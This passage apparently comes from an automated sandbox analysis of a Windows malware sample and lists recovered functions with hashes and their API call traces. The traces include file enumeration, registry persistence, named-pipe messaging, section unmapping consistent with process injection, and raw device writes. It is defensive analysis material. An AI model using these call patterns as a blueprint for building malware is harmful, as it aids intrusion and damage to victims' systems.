    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7341, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76 Total matches: 75stringfilememory
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C178D, Relevance: 18.1, APIs: 12, Instructions: 117 Total matches: 53registrythreadsleep
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1A08, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122 Total matches: 58memorythreadstring
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B32CD0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108 Total matches: 183string
Similarity
  • Total matches: 183
  • API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf
  • String ID: <
  • API String ID: 1457465641-4251816714
  • Opcode ID: 36c43c169b7f4adfcc7eed8db55d242cf47c4c2cff2d35238d5400cc3024a577
  • Instruction ID: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
  • Opcode Fuzzy Hash: 93F078708B2E8BC1CD9158C9160535692C06F30E68E9C9B137824F966B6B20312C9F9D
  • Instruction Fuzzy Hash: 3de0f454e75166d7dc89cb568257ea8f04ae800c90f99e8cafab956dcc2645f6
APIs
  • memset.NTDLL ref: 01B32CEE
  • CoInitializeEx.OLE32(00000000,00000002), ref: 01B32CF9
  • PathFindExtensionW.SHLWAPI(00000000), ref: 01B32D14
  • lstrcpyW.KERNEL32(00000000,01B38224), ref: 01B32D29
  • lstrlen.KERNEL32(01B37494,?,?,?,?,?,?,?,?,?,?,01B318D7,?), ref: 01B32D46
  • lstrcpyW.KERNEL32(00000000,01B384B8), ref: 01B32D77
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • wsprintfW.USER32 ref: 01B32DAE
  • ShellExecuteExW.SHELL32(0000003C), ref: 01B32DE3
  • CoUninitialize.OLE32 ref: 01B32DF7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C1586, Relevance: 16.6, APIs: 11, Instructions: 78 Total matches: 43memoryfile
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C20A7, Relevance: 15.2, APIs: 10, Instructions: 171 Total matches: 60memorystringthread
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DB838, Relevance: 15.1, APIs: 10, Instructions: 64 Total matches: 62sleepsynchronization
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
